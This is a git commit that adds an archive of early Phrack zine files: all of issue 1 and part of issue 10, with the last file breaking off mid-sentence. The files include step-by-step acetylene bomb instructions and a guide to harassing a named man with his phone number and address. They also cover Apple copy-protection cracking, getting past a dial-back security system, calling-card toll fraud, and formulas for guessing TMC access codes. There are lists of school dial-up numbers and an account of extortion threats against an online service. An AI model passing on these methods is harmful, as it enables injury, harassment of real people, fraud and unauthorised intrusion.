feat: init

This commit is contained in:
Aravinth Manivannan 2022-06-06 12:59:29 +05:30
commit 40c0234a43
Signed by: realaravinth
GPG key ID: AD9F0F08E855ED88
990 changed files with 831092 additions and 0 deletions

48
phrack1/1.txt Normal file
View file

@ -0,0 +1,48 @@
_ _ _______
| \/ | / _____/
|_||_|etal/ /hop
_________/ /
/__________/
(314)432-0756
24 Hours A Day, 300/1200 Baud
Presents....
==Phrack Inc.==
Volume One, Issue One, Phile 1 of 8
Introduction...
Welcome to the Phrack Inc. Philes. Basically, we are a group of phile writers
who have combined our philes and are distributing them in a group. This
newsletter-type project is home-based at Metal Shop. If you or your group are
interested in writing philes for Phrack Inc. you, your group, your BBS, or any
other credits will be included. These philes may include articles on telcom
(phreaking/hacking), anarchy (guns and death & destruction) or kracking. Other
topics will be allowed also to an certain extent. If you feel you have some
material that's original, please call and we'll include it in the next issue
possible. Also, you are welcomed to put up these philes on your BBS/AE/Catfur/
Etc. The philes will be regularly available on Metal Shop. If you wish to say
in the philes that your BBS will also be sponsering Phrack Inc., please leave
feedback to me, Taran King stating you'd like your BBS in the credits. Later
on.
TARAN KING
2600 CLUB!
METAL SHOP SYSOP
This issue is Volume One, Issue One, released on November 17, 1985. Included
are:
1 This Introduction to Phrack Inc. by Taran King
2 SAM Security Article by Spitfire Hacker
3 Boot Tracing on Apple by Cheap Shades
4 The Fone Phreak's Revenge by Iron Soldier
5 MCI International Cards by Knight Lightning
6 How to Pick Master Locks by Gin Fizz and Ninja NYC
7 How to Make an Acetylene Bomb by The Clashmaster
8 School/College Computer Dial-Ups by Phantom Phreaker
Call Metal Shop and leave feedback saying the phile topic and where you got
these philes to get your article in Phrack Inc.

49
phrack1/2.txt Normal file
View file

@ -0,0 +1,49 @@
_ _ _______
| \/ | / _____/
|_||_|etal/ /hop
_________/ /
/__________/
(314)432-0756
24 Hours A Day, 300/1200 Baud
Presents...
==Phrack Inc.==
Volume One, Issue One, Phile 2 of 8
::>Hacking SAM - A Description Of The Dial-Up Security System<::
::>Written by Spitfire Hacker<::
SAM is a security system that is being used in many colleges
today as a security feature against intrusion from the outside. This
system utilizes a dial-back routine which is very effective. To
access the computer, you must first dial the port to which SAM is
hooked up. The port for one such college is located at (818) 885-
2082. After you have called, SAM will answer the phone, but will make
no other responses (no carrier signals). At this point, you must
punch in a valid Login Identification Number on a push-button phone.
The number is in this format -- xxyyyy -- where xx is, for the number
mentioned above, 70. 'yyyy' is the last 4 digits of the valid user's
telephone number.
If a valid LIN is entered, SAM will give one of 3 responses:
1) A 1 second low tone
2) A 1 second alternating high/low tone
3) A tone burst
Responses 1 and 2 indicate that SAM has accepted your passcode and is
waiting for you to hang up. After you hang up, it will dial the valid
users phone number and wait for a second signal.
Response 3 indicates that all of the outgoing lines are busy.
If SAM accepts your passcode, you will have to tap into the valid
users line and intercept SAM when it calls. If you do this, then hit
the '*' key on your phone. SAM will respond with a standard carrier,
and you are in!
That's all that I have hacked out so far, I will write more
information on the subject later.
-%>Spitfire Hacker<%-
2600 Club!

152
phrack1/3.txt Normal file
View file

@ -0,0 +1,152 @@
==Phrack Inc.==
Volume One, Issue One, Phile 3 of 8
//////////////////////////////////////////////////////////////////////////////
/ /
/ Boot Tracing Made Easy /
/ Written by /
/ ________________ /
/ \Cheap/ \Shades/ /
/ \___/ \____/ /
/ 2600 CLUB! /
/ /
//////////////////////////////////////////////////////////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
\ \
\ Be sure to call \
\ \
\ Kleptic Palice......(314)527-5551 \
\ 5 Meg BBS/AE/CF \
\ Metal Shop..........(314)432-0756 \
\ Elite BBS (Home of 2600 CLUB! \
\ and Phrack Inc. ) \
\ \
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
About 3 or four years ago, a real good friend of mine was teaching a ML
Programming course for the Apple 2 series. I, being a good friend and
quite bored, asked him about cracking Apple games. He told me that he had
spent the last summer cracking programs. He showed me a method that he came
up with entirely on his own, boot tracing. Little did he know that this was
already quite popular but he developed his own method for doing it which from
reading other files about it, is the simplest I've ever seen. (To give you
an idea, I had SN0GGLE (I've never played the game but a friend had it on
disk.) completely loaded into memory ready to be dumped in about 12 minutes.)
Ok, first of all, ALL programs can be boot traced. The only thing is that some
may not be easily converted into files. The only programs that you should try
if you aren't real good at ML, are ones that load completely into memory. Also
to do this you will need a cassette recorder. (don't worry the program we will
save won't take too long to save, and if all goes well it will only be saved
loaded once.) I hate learning the theory behind anything so I'm not gonna
give any theory behind this. If you want the theory, read some other phile
that does this the hard way.
First make sure your cassette recoder works by BLOADing some program and
typing:
CALL -151
AA60.AA73
You'll see something that looks like this:
AA60-30 02 xx xx xx xx xx xx
AA68-xx xx xx xx xx xx xx xx
AA70-xx xx 00 08
or whatever...The 30 02 is the length ($0230 bytes). The 00 08 is the starting
address ($0800). Oh well, now you need to try and save the program. Type:
800.A2FW (A2F=$800+$230-1)
1000<800.A2FM
800:00 N 801<800.A2FM
800.A2FR
1000<800.A2FV
Once you are sure that the cassette works, (by the way do be stupid and try
that on a //c!) we can get to the good stuff...
First move the ROM boot-up code into RAM...(all steps will be from the
monitor * prompt.)
8600<C600.C6FFM
86F9:5C FF
(Now load in step 1 of the boot.)
8600G
C0E8 (turn the drive off)
(Now you have successfully loaded in track 0 sector 0) Now since we won't want
to overwrite what we've loaded in this time, Type:
8500<800.8FFM
86F9:01 85
8501L
Lets see what you've gotten...
First see if they move this part into the keyboard buffer. (A lot of programs
do this and the boot trace files that I've read don't even deal with this.)
LDX 00
LDA 800,X
STA 200,X
INX
BNE $803
JMP $211 (or any $2xx)
(sometimes done with Y's instead of X's.)
Then the next part will scramble what's in $08xx. but we don't have to worry
about that. Anyways find that JMP $2xx and change it to 4C xx 85 leaving the
xx the same. Usually this will be the next address but just to be safe...
Ok, now scan the code for any other JMP's if you find one that's direct
(indirect ones have the address in parenthesis) change it to 4C 5C FF, but
write down the location that it used to jump to first so you know where to
look. It'll probably be 301 or B700. If it's the B700, you got lucky. If it's
the 301 then you've got some more work ahead. If it was an indirect JMP, most
likely it was JMP ($003E). No if you change that to 4C 5C FF then check 3E
from monitor you'll find that 3E is 00 and 3F is 3E...Monitor uses that
place in zero page for its current memory location. So what you need to do is
8400:A5 3F 00 20 DA FD A5 3E 20 DA FD 4C 5C FF
then change that indirect jump to
85xx:4C 00 84
(by the way if the indirect jump is anything other than 3E then most likely
you can can just look at it from monitor if not write a little routine like
the one above to print out the address hidden. (Oh, check the location after
the next run. For now change it to 4C 5C FF.))
Anyways this little game will probably go on no longer than 2 or 3 loads, each
time just move the newly loaded part to another part of memory and change the
jump to jump to monitor (4C 5C FF) and the jump from the part before it to
go to the moved code.
When you find the part that JMP's up to a high area of memory (usually $B700)
you're almost done. The exit routine of the will most likely be the start of
the program. Once you intercept it there, all you have to do now is save it to
cassette and re-load DOS. The starting address for saving should be the
address that the B700 routine exits through. If this is higher than $6000 then
start saving at $2000 to get the Hi-Res pictures. Using WXYZ as your starting
address type:
WXYZ.9CFFW (This will have the main program.)
800.WXYZW (Save this are in case there is something needed down here we
don't have to start over from scratch.)
Ok now reboot:
C600G (with a DOS disk in the drive!)
CALL -151
WXYZ.9CFFR
Bsave PROGRAM,A$WXYZ,L$(Whatever 9CFF-WXYZ+1 is)
If the it gives you an error the file is too big. A quick DOS patch to fix
that is:
A964:FF
and try again.
Now that the program is saved, try and run it. (It's a good idea to take the
disk out of the drive, there's no telling what the program might try and do
if it sees that DOS is loaded in.)
WXYZG
(If it works, just to make sure that it's a good crack, power down the system
and try and BRUN it after a cold boot.)
If your saved the pictures with the program, most likely, it won't run. You
need to add a JMP at 1FFD to JMP to the main program. Then re-BSAVE it with a
starting address of A$1FFD, and add 3 to the length. If the program tries to
go to the drive while its running, I'd suggest giving up unless you really
understand non-DOS disk usage. (but if you did you probably wouldn't be
reading this.) If you get a break at an address less than $2000 then you need
to load in the second program that you saved to cassette. Put a jump in at
$800 to the main program and save the whole damn thing. If it still don't work
you're gonna need to really get fancy.
Now that you've got the thing running, it's time to figure out what is used and
what is just wasted memory. This is where I really can't help you but just
make sure that you keep a working copy and before every test power down the
machine to clear anything that might be remaining.
Have phun and good luck.....
________________
\Cheap/ \Shades/
\___/ \____/
2600 CLUB!
Be sure and get a copy of PHRACK INC., available on finer BBS/AE's everywhere.

97
phrack1/4.txt Normal file
View file

@ -0,0 +1,97 @@
_ _ _______
| \/ | / _____/
|_||_|etal/ /hop
_________/ /
/__________/
(314)432-0756
24 Hours A Day, 300/1200 Baud
Presents...
==Phrack Inc.==
Volume One, Issue One, Phile 4 of 8
THE PHONE PHREAK'S FRY-UM GUIDE
COMPILED BY THE IRON SOLDIER
WITH HELP FROM DR. DOVE
NOTE: THIS GUIDE IS STILL BEING COMPILED, AND AS PHONE PHREAKS LEARN
MORE IN THE ART OF VENGENCE IT WILL ALWAYS EXPAND.
"Vengence is mine", says the Phreak.
METHOD 1-PHONE LINE PHUN
Call up the business office. It should be listed at the front of the white
pages. Say you wanted to diconnect Scott Korman's line. DIAL 800-xxx-xxxx.
"Hello, this is Mr. Korman, I'm moving to California and would like to have
my phone service disconnected. I'm at the airport now. I'm calling from a
payphone, my number is [414] 445 5005. You can send my final bill to
:(somewhere in California. Thank you."
METHOD 2-PHONE BOOKS
Call up the business office from a pay phone. Say "Hello, I'd like to order a
Phone Book for Upper Volta (or any out-of-the way area with Direct
Dialing). This is Scott Korman, ship to 3119 N. 44th St. Milwaukee, WI
53216. Yes, I under stand it will cost $xx($25-$75!!). Thank you."
METHOD 3-PHONE CALLS
Call up a PBX, enter the code and get an outside line. Then dial 0+ the number
desired to call. You will hear a bonk and then an operator. Say, "I'd
like to charge this to my home phone at 414-445-5005. Thank you." A friend
and I did this to a loser, I called him at 1:00 AM and we left the fone off
the hook all night. I calculated that it cost him $168.
METHOD 4-MISC SERVICES
Call up the business office once again from a payfone. Say you'd like call
waiting, forwarding, 3 way, etc. Once again you are the famed loser Scott
Korman. He pays-you laugh. You don't know how funny it was talking to
him, and wondering what those clicks he kept hearing were.
METHOD 5-CHANGED & UNPUB
Do the same as in 4, but say you'd like to change and unlist your (Scott's)
number. Anyone calling him will get:
"BEW BEW BEEP. The number you have reached, 445-5005, has been changed to
a non-published number. No further....."
METHOD 6-FORWRDING
This required an accomplise or two or three. Around Christmas time, go to
Toys 'R' Us. Get everyone at the customer service or manager's desk away
("Hey, could you help me"). then you get on their phone and dial (usually
dial 9 first) and the business office again. This time, say you are from
Toys 'R' Us, and you'd like to add call forwarding to 445-5005. Scott will
get 100-600 calls a day!!!
METHOD 7-RUSSIAN CALLER
Call a payphone at 10:00 PM. Say to the operator that you'd like to book a
call to Russia. Say you are calling from a payphone, and your number is
that of the loser to fry (e.g. 445-5005). She will say that she'll have to
call ya back in 5 hours, and you ok that. Meanwhile the loser (e.g.)
Scott, will get a call at 3:00 AM from an operator saying that the call he
booked to Russia is ready.
IF YOU HAVE ANY QUESTIONS LEAVE E-MAIL FOR ME ON ANY BOARD I'M ON.
The Iron Soldier
TSF-The Second Foundation!

70
phrack1/5.txt Normal file
View file

@ -0,0 +1,70 @@
_ _ _______
| \/ | / _____/
|_||_|etal/ /hop
_________/ /
/__________/
(314)432-0756
24 Hours A Day, 300/1200 Baud
Presents...
==Phrack Inc.==
Volume One, Issue One, Phile 5 of 8
Using MCI Calling Cards
by
Knight Lightning
of the
2600 Club!
How to dial international calls on MCI:
"Its easy to use MCI for international calling."
1. Dial your MCI access number and authorization code (code = 14 digit number,
however the first 10 digits are the card holders NPA+PRE+SUFF).
2. Dial 011
3. Dial the country code
4. Dial the city code and the PRE+SUFF that you want.
Countries served by MCI:
Country code|Country code
---------------------------------------|---------------------------------------
Algeria............................213 |New Zealand........................64
Argentina..........................54 |Northern Ireland...................44
Australia..........................61 |Oman...............................968
Belgium............................32 |Papua New Guinea...................675
Brazil.............................55 |Qatar..............................974
Canada..................Use Area Codes |Saudi Arabia.......................966
Cyprus.............................357 |Scotland...........................44
Denmark............................45 |Senegal............................221
Egypt..............................20 |South Africa.......................27
England............................44 |Sri Lanka..........................94
German Democratic Republic |Sweden.............................46
(East Germany).....................37 |Taiwan.............................886
Greece.............................30 |Tanzania...........................255
Jordan.............................962 |Tunisa.............................216
Kenya..............................254 |United Arab Emirates...............971
Kuwait.............................965 |Wales..............................44
Malawi.............................265 |
===============================================================================
Thats 33 countries in all. To get the extender for these calls dial 950-1022
or 1-800-624-1022.
For local calling:
1. Dial 950-1022 or 1-800-624-1022
2. Wait for tone
3. Dial "0", the area code, the phone number, and the 14 digit authorization
code. You will hear 2 more tones that let you know you are connected.
- Knight Lightning --> The 2600 Club!
===============================================================================

45
phrack1/6.txt Normal file
View file

@ -0,0 +1,45 @@
_ _ _______
| \/ | / _____/
|_||_|etal/ /hop
_________/ /
/__________/
(314)432-0756
24 Hours A Day, 300/1200 Baud
Presents...
==Phrack Inc.==
Volume One, Issue One, Phile 6 of 8
How to Pick Master Locks
By Gin Fizz & Ninja NYC
Have you ever tried to impress your friends by picking one of those Master
combination locks and failed? Well then read on. The Master lock company has
made this kind of lock with a protection scheme. If you pull the handle of it
hard, the knob won't turn. That was their biggest mistake...... Ok, now on to
it.
1st number. Get out any of the Master locks so you know what's going on.
1: The handle part (the part that springs open when you get the combination),
pull on it, but not enough so that the knob won't move. 2: While pulling on it
turn the knob to the left until it won't move any more. Then add 5 to this
number. Congradulations, you now have the 1st number.
2nd number. (a lot tougher) Ok, spin the dial around a couple of times,
then go to the 1st number you got, then turn it to the right, bypassing the 1st
number once. WHEN you have bypassed. Start pulling the handle and turning it.
It will eventually fall into the groove and lock. While in the groove pull on
it and turn the knob. If it is loose go to the next groove; if it's stiff you
got the second number.
3rd number: After getting the 2nd, spin the dial, then enter the 2 numbers,
then after the 2nd, go to the right and at all the numbers pull on it. The lock
will eventually open if you did it right. If can't do it the first time, be
patient, it takes time.
Have phun...
Gin Fizz/2600 Club!/TPM
Ninja NYC/TPM

106
phrack1/7.txt Normal file
View file

@ -0,0 +1,106 @@
_ _ _______
| \/ | / _____/
|_||_|etal/ /hop
_________/ /
/__________/
(314)432-0756
24 Hours A Day, 300/1200 Baud
Presents...
==Phrack Inc.==
Volume One, Issue One, Phile 7 of 8
.-------------------------------------------------------------.
! /////// !
! // !
! // h e C l a s h m a s t e r ' s !
! .===============================. !
! < A C E T Y L E N E > !
! < ->B A L L O O N<- > !
! < ---->B O M B<---- > !
! `===============================' !
! Written exclusively for... !
! The Phrack Inc. !
! 2600 Club !
! Newsletter 11/01/85!
`-------------------------------------------------------------'
Imagine this. A great, inflated, green garbage bag
slowly wafting down from a tall building. It gains some speed
as it nears the ground. People look up and say, "What the....?"
The garbage bag hits! *BOOM!!!* It explodes in a thundering
fireball of green bits of plastic and flame!
"What is this?" you may ask. Well, this is the great
"Acetylene Balloon Bomb." And here is how to make it.
Ingredients:
============
(1> For a small bomb: a plastic bag. Not too big.
For something big(ger): a green, plastic garbage bag.
(2> Some "Fun-Snaps". A dozen should be more than enough.
(3> Some garbage bag twisties. String would also do.
(4> A few rocks. Not too heavy, but depends on size of
bomb and desired velocity of balloon/bomb.
(5> PRIME INGREDIENT: Acetylene. This is what is used in
acetylene torches. More on this substance later.
(6> One or more eager Anarchists.
NOTES:
======
Acetylene is a fairly dangerous substance. It is unstable upon
contact with oxygen (air). For this reason, and for your
safety, I recommend you keep all of the acetylene AWAY from any
source of oxygen. This means don't let it get in touch with
air.
Construction:
=============
(1> Fill up a bathtub with cold water. Make it VERY full.
(2> Now get put you garbage bag in the water and fill it
with water. Make sure ALL air/oxygen is out of the
bag before proceeding.
(3> Now take your acetylene source (I used it straight
from the torch, and I recommend this way also.), and
fill the bag up with acetylene.
(4> Now, being careful with the acetylene, take the bag
out of the tub and tie the opening shut with the
twisty or string. Let the balloon dry off now. (Put
it in a safe place.)
(5> Okay. Now that it is dry and filled with acetlene,
open it up and drop a few rocks in there. Also add
some Fun-Snaps. The rocks will carry the balloon
down, and the Fun-Snaps will spark upon impact, thus
setting off the highly inflammable acetylene.
*BABOOM!*
(6> Now put the twisty or string back on VERY tightly.
You now have a delicate but powerful balloon bomb.
To use:
=======
Just drop off of a cliff, airplane, building, or whatever. It
will hit the ground a explode in a fireball. Be careful you are
not near the explosion site. And be careful you are not
directly above the blast or the fireball may rise and give you
a few nasty burns.
Have fun!
But be careful...
NOTE: I, The Clashmaster, am in NO WAY responsible for the use
===== of this information in any way. This is for purely
informational purposes only!
This has been a 2600 Club production.
-=*Clash*=-
2600 Club

115
phrack1/8.txt Normal file
View file

@ -0,0 +1,115 @@
_ _ _______
| \/ | / _____/
|_||_|etal/ /hop
_________/ /
/__________/
(314)432-0756
24 Hours A Day, 300/1200 Baud
Presents...
==Phrack Inc.==
Volume One, Issue One, Phile 8 of 8
Schools and University Numbers
``````````````````````````````
Harvard University 617-732-1251
Yale 203-436-2111
District 214 312-398-8170
Chicago Board of Education 312-254-1919
Spence Schools 212-369-5114
University of Texas 214-688-1400
University of Missouri 314-341-2776
314-341-2910
(1200) 314-341-2141
Cal-Tech 213-687-4662
University of Nevada 402-472-5065
Princeton University 609-452-6736
Stony Brook University 516-246-9000
Depaul 312-939-8388
University of San Diego 619-452-6792
RPI School 518-220-6603
William State University 313-577-0260
Harvard 617-732-1802
Stockton 209-944-4523
Northwestern 312-492-3094
Circle Campus 312-996-5100
312-996-6320
University of Mexico 505-588-3351
University of Florida 904-644-2261
Queens College 212-520-7719
University of Denver 303-753-2737
303-753-2733
University of Syracuse 315-423-1313
University of Illinois 312-996-5100
University of Virginia 703-328-8086
MIT Research 1-800-545-0085
St.Louis Community College 314-645-1289
SIUE 618-692-2400
618-692-2401
618-692-2402
618-692-2403
618-692-2404
618-692-2405
618-692-2406
618-692-2407
618-692-2408
Universiti------- 215-787-1011
Willaim -------- 313-577-0260
University of Florida 904-392-5533
Col & Union College 301-279-0632
Georgia State 404-568-2131
University of Mass. 413-545-1600
Purdue 317-494-1900
Northwestern 312-492-7110
University of New Mexico 505-227-3351
University of Texas 214-688-1400
Temple University 215-787-1010
Melville High School 516-751-6806
UCSD 619-452-6900
Oakland Schools 313-857-9500
University of Maryland 301-454-6111
California St. Fulerton 714-773-3111
N.Y.U. 212-777-7600
University of San Diego 619-293-4510
University of Colorado 303-447-2540
University of Colorado 303-447-2538
MIT Research 617-258-6001
Dartmouth College 603-643-63q0
Spence School 212-369-5114
University of Washington 206-543-9713
University of Washington 206-543-9714
University of Washington 206-543-9715
University of Washington 206-543-9716
University of Washington 206-543-9717
University of NC 919-549-0881
Harvard-Law,Busi,Med Sch. 617-732-1251
Virginia University 703-328-8086
WVU 304-293-2921 thru 304-293-2939
WVU 304-293-4300 thru 304-293-4309
WVU(1200)304-293-4701 thru 304-293-4708
WVU(1200)304-293-5591 thru 304-293-5594
WVU(134.5 bps) 304-293-3601
WVU(134.5 bps) 304-293-3602
Lake Wash. School 206-828-3499
University of San Diego 619-452-6792
RPL School 518-220-6603
Another School 212-369-5114
Harvard 617-732-1251
Harvard 617-732-1802
William State University 313-577-0260
Florida University 904-644-2261
Wayne State 313-577-0260
U of F 904-644-2261
High School 513-644-3840
```````````````````````````````````````
File provided by the Alliance
6 1 8 - 6 6 7 - 3 8 2 5
7 p m - 7 a m
Uploaded by Phantom Phreaker

41
phrack10/1.txt Normal file
View file

@ -0,0 +1,41 @@
==Phrack Inc.==
Volume Two, Issue Ten, Phile #1 of 9
1/1/87
Introduction...
~~~~~~~~~~~~~~~
Well, we have made it to this, the start of a new year and the start
of a new volume of Phrack Inc. This has taken quite a while to get the long
awaited issue out, and it's been procrastinated quite a bit, so I apologize to
those that have been patiently waiting. We have purposely waited a bit, but
we also are releasing this Phrack approximately at the same time as the Legion
of Doom/Hackers Technical Journal, which is another high quality newsletter
working with us rather than against us, and I personally recommend the
documents as highly informative. I really enjoyed it and hope you continue to
support both of us.
If you wish to write for Phrack Inc., merely get in touch with myself,
Knight Lightning, Cheap Shades or Beer Wolf or anyone that knows us or is on
any of the MSP boards and we shall either get back to you or get in contact
with you in some manner. File topics can be either telecommunications or on
operating systems or some unique aspect/flaw of security. Be looking forward
to more Phrack issues in the near and far future. Later
-TK
------------------------------------------------------------------------------
This issue of Phrack Inc. includes the following:
#1 Introduction to Phrack 10 by Taran King (2.2k)
#2 Pro-Phile on Dave Starr by Taran King (7.5k)
#3 The TMC Primer by Cap'n Crax (6.1k)
#4 A Beginner's Guide to the IBM VM/370 by Elric of Imrryr (3.5k)
#5 Circuit Switched Digital Capability by The Executioner (11.9k)
#6 Hacking Primos Part I by Evil Jay (10.9k)
#7 Automatic Number Identification by Phantom Phreaker and Doom Prophet
(9.2k)
#8 Phrack World News 9 Part I by Knight Lightning (22.7k)
#9 Phrack World News 9 Part II by Knight Lightning (14.8k)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

142
phrack10/2.txt Normal file
View file

@ -0,0 +1,142 @@
==Phrack Inc.=
Volume Two, Issue 10, Phile #2 of 9
==Phrack Pro-Phile 7==
Written and Created by Taran King
12/15/86
Welcome to Phrack Pro-Phile 7. Phrack Pro-Phile is created to bring
info to you, the users, about old or highly important/controversial people.
This month, I bring to you a user from the golden years of hacking and
phreaking...
Dave Starr
~~~~ ~~~~~
Dave is one of the old phreakers and hackers that accomplished so
much through voice phreaking and literal hacking rather than reading others'
findings to learn. A master engineer, voice phreaking is one unto itself.
Dave has a PhD in B.S.
-------------------------------------------------------------------------------
Personal
~~~~~~~~
Handle: Dave Starr
Call him: Dave Starr
Past handles: Micronet Phantom and Big Brother
Handle origin: Micronet Phantom came from working with The Source
computer and Big Brother, of course, came from George
Orwell's 1984.
Date of Birth: 5/6/62
Age at current date: 24
Height: 6' 0"
Weight: 170 lbs.
Eye color: Brown
Hair Color: Light Brown
Computers: TRS-80 (4k version), Apple ][, ][+, ][e
Sysop/Co-Sysop of: Starcom Network
-------------------------------------------------------------------------------
Dave started out on The Source, and stuck with them for 6 to 8 months
hacking around the system because the system was so slow security-wise, and of
course, from there, he got involved with hacking Primes. One of the security
agents named Paul from Dialcom got in contact with Dave and discussed Dave's
hacking on The Source (his system). After talking, they found they had common
interests, which included hacking and phreaking. Paul gave Dave his first
code to a local dial-up for Sprint. He also led him in the direction of 8BBS,
which brought him to meet the best of the nation's phreakers and hackers at
the time, which included Susan Thunder, Roscoe DuPran, and Kevin Mitnick.
Susan and Roscoe were strong friends of Dave that he personally met as well as
Kevin, but he never met Kevin. He met Susan in the L.A. County Courthouse
testifying against her, with Susan and Roscoe using these handles as real
names on the charges of harassment. The phreak/hack BBS's that were most
memorable for Dave were 8BBS and his own, Starcom Network, which had hidden
commands for accessing the phreak section. Starcom Network was a nationally
networked system that Dave created and operated. This was a virtual copy of
The Source, for which he went to court over. They claimed it was their
system, but he supressed them with a threat of publicity. Modem Over
Manhattan was another memorable board on a TRS-80. He attributes his phreak
knowledge to Paul from Dialcom and to The Source for his hacking ability as
well as Susan Thunder for information on RSTS.
Dave Starr does intelligence and counter-intelligence work for anyone
who has money and who is not against the United States or the views of the
United States.
Dave has always operated independently, never being a member of a
club or group, and has hand-picked his partners.
-------------------------------------------------------------------------------
Interests: Telecomputing (phreaking and hacking), movies, a
fascination with the match-making systems (Dial-Your-Match
type systems), fun, video components.
Dave's Favorite Things
----------------------
Women: A quiet evening with the girlfriends (NOTE: Plural).
Cars: Mercedes 450-SL (his girlfriend's).
Foods: Italian.
Music: Anything excluding acid rock/heavy metal.
Leisure: Smoking, but he hates cigarettes.
Most Memorable Experiences
--------------------------
Bringing The Source's system to their knees.
The Source hackers made demands of a rate of reduction to a minimum of a 33%
decrease, which was sent with the comment, "I am in business so I understand
the money, but you are becoming too fucking greedy." Also, an article in
Source-World magazine was demanded, bigger than the one in the last issue
which was to contain the following: how long they'd been on the Source, why
they were doing this, The Source's demented point of view, their correct
point of view, how long they have been terrorizing the Source, and an apology
for lying to all the users that the rate increase was necessary, AND an open
apology to The Pirate and Micronet Phantom saying sorry for all the trouble
The Source had caused them in their quest for fair and free Sourcing. They
wanted 2 seclev 4 accounts (normal is 3). They assured The Source that they
could get them here for free, and low-and-behold, they could create anything,
but they didn't want the harassment. If they did get harassed, they would
immediately log in under seclev 7 and kill the system. The threatened that
various accounts would be killed (all with seclev 4 and up). The Source
person wrote, "Was this ever answered?". They then went on to say that they
wouldn't do any more terrorizing provided that it was responded to their
acct. within 20 minutes.
For deleting an account, he sent back a message saying, "Fuck you". He
explained how they were powerless against The Pirate and Micronet Phantom,
and how The Source shouldn't even try to catch them. They were to continue
to attack "The Empire" (The Source) until it was fair for the users.
Numerous other letters that played to the same tune.
Some People to Mention
----------------------
TCA Vic of The Source - Customer Service Manager/Gestapo Police
(Who he dearly hated and always has thought of
sticking a broomstick up his ass)
Paul of Dialcom (Introduced him to phreaking and put his paranoia to rest)
Susan Thunder (For teaching him RSTS and other things)
Bruce Patton (On his rag list due to a disagreement. He received a
electricity shut-down and a phone system shut-down of his law
office as well as forwarding all calls to the 8BBS)
Roscoe DuPran (For having him go to court with him and meeting Susan in
person and for many other things [unmentionable here])
The Pirate of Las Vegas (For his helpful continual harassment of The Source)
Kevin Metnick (For his infrequent but helpful service)
Larry of Modem Over Manhattan (For being there and his BBS being there)
Bernard of 8BBS (For being there and his BBS being there)
-------------------------------------------------------------------------------
I hope you enjoyed this file, look forward to more Phrack Pro-Philes coming in
the near future. ...And now for the regularly taken poll from all interviewees.
Of the general population of phreaks you have met, would you consider most
phreaks, if any, to be computer geeks? Only The Pirate, a 13 year old, fit
this description. Thank you for your time, Dave.
Taran King
Sysop of Metal Shop Private

127
phrack10/3.txt Normal file
View file

@ -0,0 +1,127 @@
==Phrack Inc.==
Volume Two, Issue Ten, Phile #3 of 9
**********************************
* The TMC Primer *
*--------------------------------*
* Written by: Cap'n Crax *
*--------------------------------*
* December 17, 1986 *
**********************************
This file was originally intended to be a "data file" of info on TMC ports,
formulas, etc, but I decided that it would serve a better use as a "tutorial"
of sorts. But first a bit of background info...
Who is TMC?
TMC (TeleMarketing Communications) is a long distance service serving all 50
states. While not as well known as MCI or Sprint, they are a fairly large
company. They are capable of setting up business communications systems,
PBX's, and residential service. Unlike most LDC's, however, they operate on a
"franchise" basis, which means that each franchise of the company has little
information about any other franchise, although they do use the same lines and
the same type of equipment.
So, what can they do for me?
Well, for most of us, TMC offers many new potentials for abuse. One of the
primary weak points of the company is the code formats that they decided to
use. Codes on all TMC ports are seven digits. If they were generated
randomly, this would be a reasonably secure system from sequential code
hacking. But TMC doesn't use random codes. Instead, they use a checksum based
formula system, with different formulas on each port. I assume that this is
because they wanted a wide displacement of the codes over the seven-digit
series, so that a sequential code hacker wouldn't be able to get 2 or 3 good
codes in a row. Or perhaps they are just very stupid. In any case, it's
interesting that they seem to have never thought of what could happen if
anyone ever managed to figure out any of these formulas. Anyway, that's what
this file is about.
Great! What else can you tell me?
Well, TMC seems to use some form of the Dimension PBX system for their billing
system (Their ads say that the switching equipment is digital). This makes
TMC ports easily identifiable by the "Hi-Lo" bad code siren. For those who
worry about such things, TMC is one of the "safer" companies to use. This is
largely because, unlike "unified" companies like MCI, TMC franchises don't
really care if another franchise is losing money. Since each franchise is
independent of all others, there are many 800 ports, one for each franchise.
If you use an out-of-state 800 port, you are free from such worries as ANI,
which I have never perceived as a major threat to the code-user anyway. Also,
TMC offers lots of opportunities for the aspiring security consultant
(hehehe).
Ok, so where's some real info?
Right here. I am going to explain as much about TMC hacking as I can manage,
without actually handing out codes. First, an example port. The example I am
using is the 800 port for Louisville, KY.
1-800-626-9600
This is the port. If you are not familiar with TMC, you may want to call it
to see what it sounds like. So let's say you call it and recognize it as a
TMC. What next? Well, a good bet would be to run a standard "code-hack"
program on it... Set it for seven digits, 1+ the number, and note that TMC
codes start with 0 on more than 50% of the ports I have seen. So let's say
that you then get this list of (fictional) codes...
0347589
0347889
0348179
0350358
0355408
At first glance, this may look like a series of "random" numbers. But, look
closer. These numbers are based on a checksum. It is as follows...
Code Format: 03xabcy
x+y=13
(In the first code, x=4 and y=9, and, of course, 4+9=13)
a+c=15
(Here, a=7 and c=8, and 7+8=15)
b=1 to 9
(Digit "b" is unrelated to the rest of the numbers. It could, for example, be
varied from 1-9 to possibly find more working codes)
Also note that 0+5 would equal 15, since the 0 is really a 10. Really!
Please note that the above formula is only fictional. I wouldn't want to
possibly cause loss to TMC by giving away codes on their system!
Is that all?
No, of course not. TMC, in their love of telecom enthusiasts, has also put an
additional prize in the Krackerjack box. The vast majority of TMC ports have
"Outside Line" codes, which is a 2 or 3 digit number, that, when entered after
certain codes, will give an AT&T dialtone. This is apparently a holdover from
the fact that they are using PBX equipment. Anyway, if anyone is asking why
you'd want an AT&T dialtone, (does anyone need to ask?) it will allow
unrestricted calling. This, of course, means 976's, 900's, Alliance
Teleconf., international calling, etc... Naturally, I can't list any of these,
but I can say that if it is 2 digits, it would start with any number from 2-9
and end in 8 or 9. If it is three digits, it will almost always start with 6,
and be followed by any two digits. Some possible outside line codes would be
59, 69, 89, 99, 626, 636, 628, etc... These, of course, are only examples of
possible codes. As I mentioned, these O/S line codes are entered after the
seven digit code. The O/S line codes only work after certain 7-digit codes,
and from my experience, the 7-digit codes that they work with normally can't
be used for the usual 7 digits+1+number dialing. I can find no apparent
pattern to the codes that they do work with, so you will have to find them by
trial-and-error.
What, you want more?
Ok, well, here's a few 800 ports...
1-800-433-1440 1-800-227-0073 1-800-331-9922 1-800-451-2300
1-800-354-9379 1-800-248-4200 1-800-531-5084 1-800-351-9800
Closing.
Please note that this article is only intended as an overview of TMC and why
